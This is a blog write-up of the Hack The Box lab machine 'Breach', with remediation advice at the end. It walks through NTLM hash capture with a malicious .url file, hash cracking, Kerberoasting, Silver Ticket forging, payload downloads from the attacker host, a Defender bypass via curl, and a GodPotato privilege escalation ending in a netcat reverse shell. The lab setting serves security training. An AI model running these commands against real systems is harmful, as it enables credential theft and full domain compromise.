Hacking Insights by Max Bautista

Breach writeup

Box name: Breach

Difficulty: Medium

OS: Windows

Overview: Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials. With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server. Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.

Link: https://app.hackthebox.com/machines/Breach?sort_by=created_at&sort_type=desc

Machine IP: 10.129.16.205

The User flag for this Box is located in a non-standard directory, C:\share\transfer.

Ran rustscan against the machine.

I’ll check out SMB first.

smbclient -N -L //10.129.16.205/ 

Connecting to share we seem some interesting directories and users.

smbclient //10.129.16.205/share

This share is writable and interestingly julia’s directory was last updated at a completely different time than the others. Will see if we can capture a hash using NTLM coercion. Created a file pwn.url.

[InternetShortcut]
URL=http://10.10.16.27/
IconFile=\\10.10.16.27\share\icon.ico
IconIndex=1

Ran responder.

Sudo responder -I tun0

Put the file in the SMB transfer directory and right away I got Julia’s hash.

Saved the hash to a file and I was able to crack it with hashcat.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

julia.wong:Computer1

Couldn’t get a shell or evilwinrm but earlier the machine told us the user.txt would be in the share and it is.

Did further enumeration with the new creds we have. I was able to find the domain users.

nxc ldap 10.129.16.205 -u julia.wong -p ‘Computer1’ –users

Created a list with those users. Kerberoasted next though and we actually get a hash for svc_mssql.

GetUserSPNs.py breach.vl/julia.wong:’Computer1′ -dc-ip 10.129.16.205 -request

I was able to crack this successfully too.

hashcat -m 13100 hash2.txt /usr/share/wordlists/rockyou.txt

svc_mssql:Trustno1

Did more enumeration but couldn’t find anything of importance. Ran bloodhound to see if it could guide me.

bloodhound-python -u svc_mssql -p ‘Trustno1’ -d breach.vl -ns 10.129.16.205 -c All –zip

I was stuck here and referred to the writeup. I missed the SPN in Bloodhound. Theres a MSSQL service definitely running.

Originally as nmap didn’t pick it up it just went over my head. We can perform a Silver Ticket Attack. We can get the SID of the domain from bloodhound.

ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain breach.vl -dc-ip 10.129.16.205 -user-id 500 Administrator

Export the ticket.

export KRB5CCNAME=Administrator.ccache

Then we can connect to MSSQL and get a shell through it.

mssqlclient.py -k breachdc.breach.vl

Got a base64 revshell from https://www.revshells.com/

When enumerating privileges, I noticed we have SeImpersonatePrivilege. Created meterpreter payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.27 LPORT=1338 -f exe -o shell.exe

Set up listener in msfconsole.

Downloaded it to victim machine.

 wget http://10.10.16.27/shell.exe -OutFile C:\Windows\Temp\shell.exe

This didn’t work as Defender was blocking this. Tried doing more poking but I got stuck. I looked at the writeup again- Instead we can use a potato attack like GodPotato https://github.com/BeichenDream/GodPotato. Apparently wget is blocked but curl works. 

cd C:\windows\tasks 

curl http://10.10.16.27/GodPotato-NET4.exe -o GodPotato.exe 

curl http://10.10.16.27/nc64.exe -o nc.exe

.\GodPotato.exe -cmd “C:\windows\tasks\nc.exe 10.10.16.27 4444 -e cmd.exe”

And we finally get a shell and can grab root.txt.

Attack Chain

1 – Reconnaissance Ran RustScan and identified SMB ports. Checked SMB with anonymous access and found a readable and writable share directory with user folders including one for julia.wong that had been modified at a different time than the others, suggesting active use.

smbclient -N -L //10.129.16.205/ smbclient //10.129.16.205/share

2 – NTLM hash capture via malicious URL file The share transfer directory was writable. Created a malicious .url file referencing an attacker-controlled UNC path to trigger an NTLM authentication request when a user browsed the directory. Set up Responder and placed the file in julia.wong’s directory. Captured julia.wong’s NTLMv2 hash immediately. Cracked it with Hashcat using rockyou.

sudo responder -I tun0 hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Credentials recovered: julia.wong:Computer1

3 – User flag and domain enumeration Retrieved user.txt from the SMB share as specified in the box notes. Enumerated domain users via LDAP with the new credentials and built a user list. Kerberoasted and received a TGS hash for svc_mssql. Cracked it with Hashcat.

GetUserSPNs.py breach.vl/julia.wong:’Computer1′ -dc-ip 10.129.16.205 -request hashcat -m 13100 hash2.txt /usr/share/wordlists/rockyou.txt

Credentials recovered: svc_mssql:Trustno1

4 – Silver Ticket attack and MSSQL access Ran BloodHound and identified an MSSQL SPN registered to svc_mssql. Performed a Silver Ticket attack using the svc_mssql NTLM hash and domain SID to forge a Kerberos ticket impersonating the Administrator account for the MSSQLSvc service. Connected to MSSQL using the forged ticket and enabled xp_cmdshell to achieve code execution as svc_mssql.

ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain breach.vl -dc-ip 10.129.16.205 -user-id 500 Administrator export KRB5CCNAME=Administrator.ccache mssqlclient.py -k breachdc.breach.vl

5 – Privilege Escalation – GodPotato SeImpersonatePrivilege abuse Identified SeImpersonatePrivilege on the svc_mssql account. Attempted to download a Meterpreter payload via PowerShell wget but Defender blocked it. Switched to curl which bypassed the restriction. Downloaded GodPotato and nc64.exe to C:\Windows\Tasks and executed GodPotato to impersonate SYSTEM and spawn a reverse shell. Retrieved root.txt.

curl http://10.10.16.27/GodPotato-NET4.exe -o GodPotato.exe .\GodPotato.exe -cmd “C:\windows\tasks\nc.exe 10.10.16.27 4444 -e cmd.exe”

Key Takeaways

1. Writable SMB share enabling NTLM hash capture – The share transfer directory allowed anonymous or guest write access, enabling placement of a malicious .url file that triggered NTLM authentication when browsed by a domain user. SMB shares must be restricted to the minimum required permissions and write access must require explicit authentication. Shares must never be writable by anonymous or guest accounts.
   
2. Weak password crackable with rockyou – julia.wong – Julia’s NTLMv2 hash was cracked using the rockyou wordlist. Domain user passwords must meet complexity requirements that resist offline cracking. A captured NTLMv2 hash is only as secure as the underlying password and weak passwords make hash capture attacks immediately effective.
   
3. Kerberoastable service account with a weak password – svc_mssql – The svc_mssql account had an SPN registered and used the well-known password Trustno1, crackable in seconds. Service accounts with SPNs must use passwords of at least 25 randomly generated characters to make offline Kerberoast cracking computationally infeasible. Consider using Group Managed Service Accounts to automate password rotation.
   
4. Silver Ticket attack enabled by service account hash – The svc_mssql NTLM hash obtained via Kerberoasting was sufficient to forge Silver Tickets impersonating any domain user for the MSSQL service without contacting the domain controller. Service account password compromise in a Silver Ticket context bypasses all domain-level monitoring. Rotating the svc_mssql password immediately is critical.
   
5. SeImpersonatePrivilege on an MSSQL service account enabling SYSTEM escalation – The svc_mssql service account held SeImpersonatePrivilege, allowing a potato-style attack to impersonate SYSTEM. MSSQL service accounts must run under a dedicated least-privilege gMSA without SeImpersonatePrivilege and must be explicitly removed from any group granting this right.
   

Remediation

[Immediate] Restrict SMB share write permissions Remove anonymous and guest write access from all SMB shares immediately. Require explicit authenticated authorization for write access and restrict the transfer directory to only the users with an operational requirement. Implement monitoring to alert on .url, .lnk, and .scf files being created on SMB shares as these are indicators of hash capture attempts.

[Immediate] Rotate all compromised credentials and enforce strong passwords Rotate julia.wong and svc_mssql passwords immediately. Implement a Fine-Grained Password Policy requiring a minimum of 15 characters with complexity for all domain accounts and a minimum of 25 randomly generated characters for all service accounts. Deploy a banned password list blocking Trustno1, Computer1, and similar common patterns.

[Immediate] Migrate svc_mssql to a Group Managed Service Account Replace the svc_mssql standard user account with a gMSA to automate password rotation and eliminate the risk of Kerberoasting. gMSA passwords are 240 characters randomly generated and rotated automatically. Remove SeImpersonatePrivilege from the MSSQL service account by running MSSQL under a properly configured gMSA with the minimum required permissions.

[Immediate] Disable xp_cmdshell and restrict MSSQL surface Disable xp_cmdshell on all MSSQL instances where it is not explicitly required for a documented operational function. Audit all other dangerous MSSQL features including xp_dirtree, Ole Automation Procedures, and linked servers and disable any that are not required. Restrict MSSQL network access to authorized application servers only.

[Short-term] Implement Silver Ticket detection and Kerberos monitoring Deploy SIEM detection rules for Silver Ticket indicators including Kerberos service ticket requests that bypass the KDC and authentication events using tickets with anomalous attributes. Enable advanced Kerberos audit logging on all domain controllers. Run BloodHound regularly to identify Kerberoastable accounts and prioritize remediating those with weak or crackable passwords.

[Long-term] Implement a tiered service account governance program Define a policy requiring all service accounts to use gMSAs where technically feasible, with regular audits of all accounts holding SPNs. Establish SLAs for remediating Kerberoastable accounts with weak passwords. Include MSSQL security configuration, SMB share permissions, and Silver Ticket attack paths in the regular penetration testing scope.